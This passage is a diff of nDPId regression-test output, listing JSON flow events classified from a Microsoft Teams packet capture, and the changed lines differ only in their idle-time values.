{"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} -00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1587041678029,"flow_last_seen":1587041678303,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":12049,"flow_avg_l4_payload_len":463,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60537,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} -00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1587041681745,"flow_last_seen":1587041681895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7654,"flow_avg_l4_payload_len":382,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.70","src_port":60538,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1587041681755,"flow_last_seen":1587041681908,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7598,"flow_avg_l4_payload_len":379,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.69","src_port":60539,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":77,"flow_first_seen":1587041676362,"flow_last_seen":1587041677077,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":60045,"flow_avg_l4_payload_len":779,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60532,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} +00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1587041677042,"flow_last_seen":1587041677375,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":20082,"flow_avg_l4_payload_len":590,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60535,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} +00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1587041678029,"flow_last_seen":1587041678303,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":12049,"flow_avg_l4_payload_len":463,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60537,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} +00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1587041681745,"flow_last_seen":1587041681895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7654,"flow_avg_l4_payload_len":382,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.70","src_port":60538,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1587041681755,"flow_last_seen":1587041681908,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7598,"flow_avg_l4_payload_len":379,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.69","src_port":60539,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041682355,"flow_last_seen":1587041682370,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":65387,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Web"}} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":24,"flow_first_seen":1587041682076,"flow_last_seen":1587041682204,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":12188,"flow_avg_l4_payload_len":507,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.70","src_port":60540,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1587041682077,"flow_last_seen":1587041682212,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10552,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.69","src_port":60541,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} -00820{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":107,"flow_first_seen":1587041682369,"flow_last_seen":1587041683086,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":86354,"flow_avg_l4_payload_len":807,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60543,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1587041682376,"flow_last_seen":1587041692106,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":9736,"flow_avg_l4_payload_len":256,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.76.48","src_port":60544,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":83,"flow_first_seen":1587041682698,"flow_last_seen":1587041691929,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":14416,"flow_avg_l4_payload_len":173,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.58","src_port":60545,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1587041683186,"flow_last_seen":1587041683511,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10412,"flow_avg_l4_payload_len":297,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.88.59","src_port":60547,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} -00819{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1587041683333,"flow_last_seen":1587041683650,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15546,"flow_avg_l4_payload_len":536,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60548,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} -00823{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1587041685106,"flow_last_seen":1587041685981,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":8860,"flow_avg_l4_payload_len":369,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.15.45","src_port":60551,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} -00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1587041685232,"flow_last_seen":1587041685890,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9605,"flow_avg_l4_payload_len":384,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60552,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} -00820{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1587041685248,"flow_last_seen":1587041688035,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":11696,"flow_avg_l4_payload_len":377,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60555,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} -00819{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1587041686239,"flow_last_seen":1587041686589,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":18814,"flow_avg_l4_payload_len":570,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60559,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} -00819{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1587041687245,"flow_last_seen":1587041688061,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":22353,"flow_avg_l4_payload_len":604,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60561,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1587041691149,"flow_last_seen":1587041691582,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10149,"flow_avg_l4_payload_len":307,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.108.8","src_port":60565,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":24,"flow_first_seen":1587041694219,"flow_last_seen":1587041695993,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":8320,"flow_avg_l4_payload_len":346,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.136","src_port":60567,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":24,"flow_first_seen":1587041682076,"flow_last_seen":1587041682204,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":12188,"flow_avg_l4_payload_len":507,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.70","src_port":60540,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1587041682077,"flow_last_seen":1587041682212,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10552,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.69","src_port":60541,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} +00820{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":107,"flow_first_seen":1587041682369,"flow_last_seen":1587041683086,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":86354,"flow_avg_l4_payload_len":807,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60543,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1587041682376,"flow_last_seen":1587041692106,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":9736,"flow_avg_l4_payload_len":256,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.76.48","src_port":60544,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":83,"flow_first_seen":1587041682698,"flow_last_seen":1587041691929,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":14416,"flow_avg_l4_payload_len":173,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.58","src_port":60545,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1587041683186,"flow_last_seen":1587041683511,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10412,"flow_avg_l4_payload_len":297,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.88.59","src_port":60547,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} +00819{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1587041683333,"flow_last_seen":1587041683650,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15546,"flow_avg_l4_payload_len":536,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60548,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} +00823{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1587041685106,"flow_last_seen":1587041685981,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":8860,"flow_avg_l4_payload_len":369,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.15.45","src_port":60551,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} +00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1587041685232,"flow_last_seen":1587041685890,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9605,"flow_avg_l4_payload_len":384,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60552,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} +00820{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1587041685248,"flow_last_seen":1587041688035,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":11696,"flow_avg_l4_payload_len":377,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60555,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} +00819{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1587041686239,"flow_last_seen":1587041686589,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":18814,"flow_avg_l4_payload_len":570,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60559,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} +00819{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1587041687245,"flow_last_seen":1587041688061,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":22353,"flow_avg_l4_payload_len":604,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60561,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1587041691149,"flow_last_seen":1587041691582,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10149,"flow_avg_l4_payload_len":307,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.108.8","src_port":60565,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":24,"flow_first_seen":1587041694219,"flow_last_seen":1587041695993,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":8320,"flow_avg_l4_payload_len":346,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.136","src_port":60567,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1587041672419,"flow_last_seen":1587041697427,"flow_idle_time":180000,"flow_min_l4_payload_len":279,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":1674,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} 